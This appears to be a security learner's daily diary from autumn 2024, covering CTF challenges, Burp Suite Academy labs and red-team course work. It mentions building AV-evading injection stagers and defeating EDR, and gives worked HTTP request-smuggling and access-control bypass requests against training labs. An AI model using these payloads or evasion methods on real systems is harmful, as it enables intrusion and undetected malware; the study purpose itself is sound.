Daily diary

This is a collection of my daily adventures in cyber learning

24.10.2024

Malware development

  • Spent all week trying to defeat Elastic EDR
  • Today I DID IT

18.10.2024

RTO exam day 1

  • Finished all machines
  • Was fun

17.10.2024

Home lab setup

-Setup ElasticSearch and Kibana with Fleet Server and EDR

16.10.2024

RTO

  • played around with cobalt strike, exam prep

15.10.2024

Malware development

  • Created a stager using Local Mapping Injection method

Red Team Ops

  • Played around with bypassing defender with UAC-bypasses

14.10.2024

Malware development

  • Created a stager using Early Bird APC method

13.10.2024

Malware development

  • Thread-hijacking stager
  • APC-injection stager

12.10.2024

Malware development

  • Setup Dev environment
  • Made basic template for a stager which uses AES and Base64 to avoid AV

11.10.2024

RTO

  • Setup PortBender and SOCKS proxy via Cobalt Strike

10.10.2024

Off day

  • Played around with friends new WooCommerce store

9.10.2024

Lazy day

  • Played around with Active Directory Certificate Services on RTO

8.10.2024

Burp Suite

  • Got exam result (passed)
  • Active Directory on RTO

7.10.2024

RTO

  • Cobalt Strike
  • Created a custom CNA

6.10

RTO

  • Got another month on RTO labs
  • Antivirus evasion with Cobalt Strike
  • Mostly a refresher

5.10.2024

Huntress CTF

  • Did one of the most useless challenges to date

HTB Academy

  • Started Advanced Deserialization Attacks module
  • Dotnet deserialization vulns

4.10.2024

Burpsuite exam

  • Got all the solutions, waiting for the final result, should pass unless something weird happens

Huntress CTF

  • Some bullshit challanges time around

3.10.2024

Huntress CTF!

  • Some log analysis, nothing interesting
  • Did some dynamic analysis on a powershell script via procmon

2.10.2024

Huntress CTF !

- Some phishing, nothing really exciting here

1.10.2024

Huntress CTF!

  • jse file decrypting!
  • can be done with https://github.com/sstraw/scrdec
  • UPDATE: Even better! Use CyberChef!!!

30.9.2024

Burpsuite Academy

-Random labs here and there

29.9.2024

Burpsuite Academy

  • Some mystery boxes, tried SQL injection via burp

28.9.2024

Burpsuite Academy

Practice exam

  • Did another practice exam
  • Did not pass on time again (had some breaks, was very close on first try even with breaks)
  • Second try managed to solve it in very little time

XSS practice

- Did some labs to practice XSS filter evasion

27.9.2024

Burpsuite academy

  • Did pracice exam and some mystery boxes

  • Failed on time, managed to solve it on second try

  • Need to focus more on filter evasion

26.9.2024

BurpSuite Academy

Access Control

  • Nothing really new here, good refresher
  • Some headers to try bypass restricted routes:
X-Original-URL
X-Rewrite-URL

Eg

GET / HTTP/2
Host: 0a3600fd0451e51281233422003600f9.web-security-academy.net
X-Original-Url: /admin

Cache flaws

  • Same here, HTB EasterBunny taught me well on the cache things!
  • One random trick: language cookies can be also cached, rarely, but sometimes

25.9.2024

Burpsuite Academy

Request smuggling

  • Tried to understand how this vuln actually works

    1) Cl.TE

  • Frontend server sends content according to the Content-Length header. Backend uses Transfer-Encoding to detect request length

  • This can be detected by sending two requests in one connection, Content-length header can be length of the transfer-encoding part and the second request

Example:

POST / HTTP/1.1

Host: 0aff002304fcf3238029800a00c400e7.web-security-academy.net

Content-Length: 49

Transfer-Encoding: chunked

e

q=smuggling&x=

0

GET /404 HTTP/1.1

Foo: x

Here, content length is equal to everything after the first headers. Transfer-Encoding size is put as e (12 in decimal) which includes the "q=smuggling&x=" part. Since frontend uses CL it sends both of these requests in the same time and backend processes these as separate requests. This means that backend sends us a response and starts waiting for end of our smuggled request "GET /404". After we or someone else sends a request they receive error 404 since there is no /404 path.

2) TE.CL

  • This works in reverse. Frontend uses Transfer-Encoding header and Backend uses Content-Length. We send a request with small Content-Length header value and include our smuggled request in the Transfer-Encoding part of the request

Example:

POST / HTTP/1.1

Host: 0ae600f6039234d480b2d0de00e0009e.web-security-academy.net

Content-Type: application/x-www-form-urlencoded

Content-Length: 4

Transfer-Encoding: chunked

9e

GET /404 HTTP/1.1

Host: 0ae600f6039234d480b2d0de00e0009e.web-security-academy.net

Content-Type: application/x-www-form-urlencoded

Content-Length: 144

x=

0

There, content-length is 4 and it includes data just before the next "GET". Transfer-Encoding length (9e) includes the second request. Since frontend uses TE it sends the request as one. Frontend processes these as two requests, and the next request will be the GET /404

24.9.2024

Browsed through BurpSuite Academy

Logic bugs

Nothing major, just a reminder to try to always go with unintended application flow and try to go with unexpected or intentionally missing parameters. Also, skip events when possible (don't follow redirects etc..)

Eg. with numbers use negative or very big numbers, On strings use long strings.

Some basic deserilization

Nothing new, nice reminder of mostly php deserilization vulnerabilities

Nice caviat: when comparing number zero to string loosely on PHP it returns always true. Eg

if(0 == "test") {echo "???";}